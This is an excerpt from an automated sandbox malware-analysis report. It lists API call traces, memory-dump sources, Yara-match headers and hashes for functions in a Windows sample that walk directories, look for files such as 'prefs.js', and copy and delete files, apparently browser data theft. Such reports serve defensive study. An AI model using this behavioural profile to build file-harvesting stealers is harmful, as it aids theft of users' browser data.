                                      • lstrlenA.KERNEL32(?), ref: 004146F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 13328894-2848263008
                                      • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                      • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                      • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                      • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                      APIs
                                      • wsprintfA.USER32 ref: 02314B93
                                      • FindFirstFileA.KERNEL32(?,?), ref: 02314BAA
                                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 02314BD8
                                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 02314BEE
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 02314DE4
                                      • FindClose.KERNEL32(000000FF), ref: 02314DF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                      • Instruction ID: 5dd3e5f43df826bd0bd500ccaa352ac3365fa0eae4036cf8197c7dbaa1eab6bc
                                      • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                      • Instruction Fuzzy Hash: 3C6178B5540218BBCB34EBE0DD84FEA73BDFB49701F00858DA64996180EB75A745CF91
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0230C15C
                                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 0230C1B4
                                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 0230C1CA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230CA26
                                      • FindClose.KERNEL32(000000FF), ref: 0230CA38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                      • Instruction ID: 6f8bf1a57c9a789ed43045d7dc866e5cea89a34ecd2575c697bd6bc3d68e37bf
                                      • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                      • Instruction Fuzzy Hash: 77423372A11108ABCB2CFBB0DDA5EED777AAF94301F40455DA50A961D0EF349B48CFA1
                                      APIs
                                      • wsprintfA.USER32 ref: 00413EC3
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                      • FindClose.KERNEL32(000000FF), ref: 00414081
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                      • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                      • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                      • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 023147E7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023147EE
                                      • wsprintfA.USER32 ref: 0231480D
                                      • FindFirstFileA.KERNEL32(?,?), ref: 02314824
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 02314852
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 02314868
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 023148F2
                                      • FindClose.KERNEL32(000000FF), ref: 02314907
                                      • lstrcat.KERNEL32(?,0064A524), ref: 0231492C
                                      • lstrcat.KERNEL32(?,0064A22C), ref: 0231493F
                                      • lstrlen.KERNEL32(?), ref: 0231494C
                                      • lstrlen.KERNEL32(?), ref: 0231495D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID:
                                      • API String ID: 671575355-0
                                      • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                      • Instruction ID: aaff60aec62ada5619ea0999a816107f38a9503b351cc3610ae4bcf5c005d175
                                      • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                      • Instruction Fuzzy Hash: 6D5175B5580218ABDB34EBB0DD89FEE737DEB58700F404588E64D92190EB759B84CFA1
                                      APIs
                                      • wsprintfA.USER32 ref: 0231412A
                                      • FindFirstFileA.KERNEL32(?,?), ref: 02314141
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0231416F
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 02314185
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 023142D3
                                      • FindClose.KERNEL32(000000FF), ref: 023142E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                      • Instruction ID: c746763b1d58c26e99ae7632f3ac38c60a217e7f69cf4d099f5b5bd120cabe26
                                      • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                      • Instruction Fuzzy Hash: B45173B5900218BBCB28FBF0DC84FEA737DBB44700F008598A64992080DB75E785CF95
                                      APIs
                                      • wsprintfA.USER32 ref: 0040ED3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                      • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                      • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                      • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                      • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                      • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                      • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: 4@$\*.*
                                      • API String ID: 2325840235-1993203227
                                      • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                      • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                      • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                      • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                      • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                      • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                      • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                      • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,00401F2C,?,004251BC,?,?,00000000,?,00000000), ref: 00401923
                                      • StrCmpCA.SHLWAPI(?,00425264), ref: 00401973
                                      • StrCmpCA.SHLWAPI(?,0042530C), ref: 00401989
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                      • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                      • FindClose.KERNEL32(000000FF), ref: 00401E32
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
                                      • Instruction ID: fa2d6fe3b05614b5a30e4509255bbbb1abe281ca63e4f804ed0983082d36a12e
                                      • Opcode Fuzzy Hash: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
                                      • Instruction Fuzzy Hash: 681260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                      APIs
                                      • wsprintfA.USER32 ref: 0230EFA5
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0230EFBC
                                      • StrCmpCA.SHLWAPI(?,00421538), ref: 0230F012
                                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 0230F028
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230F515
                                      • FindClose.KERNEL32(000000FF), ref: 0230F52A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                      • Instruction ID: b57ec0aceceee84dfa6a6abd29488d6b0387febf9424de806deb86be1a4fd390
                                      • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                      • Instruction Fuzzy Hash: 3AE1BB72912258AADB7CFB60DD90EEEB73AAF54301F4041D9A50A62491EF306FC9CF51
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                      • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                      • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                      • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                      • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0230DD52
                                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 0230DD9A
                                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 0230DDB0
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230E033
                                      • FindClose.KERNEL32(000000FF), ref: 0230E045
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                      • Instruction ID: f78663529de89b34bfe7d7adbe65eed03ecdd9f6f784a9f0b427f73620252438
                                      • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                      • Instruction Fuzzy Hash: 899135729002089BCB28FBB0DE95DEE777EAF95301F40865DE44A961D0EE349B58CF91
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0230F985
                                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 0230F9D6
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0230F9EC
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230FD18
                                      • FindClose.KERNEL32(000000FF), ref: 0230FD2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                      • Instruction ID: 9395b8469c18d492969d58d838a4f450f92753e07b2bb10e3aac7f5a8e390821
                                      • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                      • Instruction Fuzzy Hash: A8B14071A012189BCB38FF60DDA5FEE777AAF55301F4081A9940E96590EF30AB48CF91
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*$@
                                      • API String ID: 433455689-2355794846
                                      • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                      • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                      • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                      • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
